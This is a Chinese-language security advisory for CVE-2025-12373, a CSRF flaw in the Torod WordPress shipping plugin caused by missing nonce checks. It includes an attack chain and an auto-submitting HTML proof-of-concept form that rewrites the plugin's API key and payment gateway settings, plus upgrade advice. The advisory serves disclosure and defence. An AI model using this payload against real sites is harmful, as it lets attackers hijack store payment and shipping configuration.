CVE-2025-12373 CVSS 4.3 中危

CVE-2025-12373: Torod WordPress插件CSRF漏洞可修改插件设置

披露日期: 2025-12-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12373

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Torod – The smart shipping and delivery portal for e-shops and retailers (WordPress插件)

漏洞概述

Torod是一款为电商和零售商设计的智能配送和物流门户WordPress插件。该插件在1.9及以下所有版本中存在跨站请求伪造(CSRF)漏洞。漏洞存在于save_settings函数中，由于缺少或错误地进行了nonce验证，攻击者可以构造恶意请求，诱骗已登录的管理员访问，从而在管理员不知情的情况下修改插件设置。攻击者可利用此漏洞更改配送配置、API密钥、支付设置等敏感参数，可能导致订单处理异常、敏感信息泄露或进一步利用。

技术细节

该漏洞源于WordPress插件的save_settings函数未正确实现CSRF保护机制。攻击者通过构造包含恶意参数的表单请求，当管理员被诱导点击链接或访问特定页面时，浏览器会自动携带管理员的认证Cookie发送请求。由于缺少nonce验证，服务器无法区分请求来源的合法性，导致攻击者能够成功修改插件配置。

攻击链分析

STEP 1

攻击者构造包含恶意配置参数的CSRF表单

STEP 2

通过钓鱼邮件或社交工程诱导管理员访问恶意页面

STEP 3

管理员浏览器自动发送携带认证Cookie的请求

STEP 4

服务器因缺少nonce验证而接受请求，插件配置被篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html><body><form action="http://target-site/wp-admin/admin.php?page=torod_settings" method="POST" enctype="multipart/form-data"><input type="hidden" name="save_settings" value="1"><input type="hidden" name="shipping_api_key" value="malicious_key"><input type="hidden" name="payment_gateway" value="attacker_gateway"><input type="submit" value="Submit request"></form><script>document.forms[0].submit();</script></body></html>

影响范围

1.9及以下所有版本

防御指南

临时缓解措施

立即升级到插件的最新版本，并在所有敏感操作中实现nonce验证机制。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表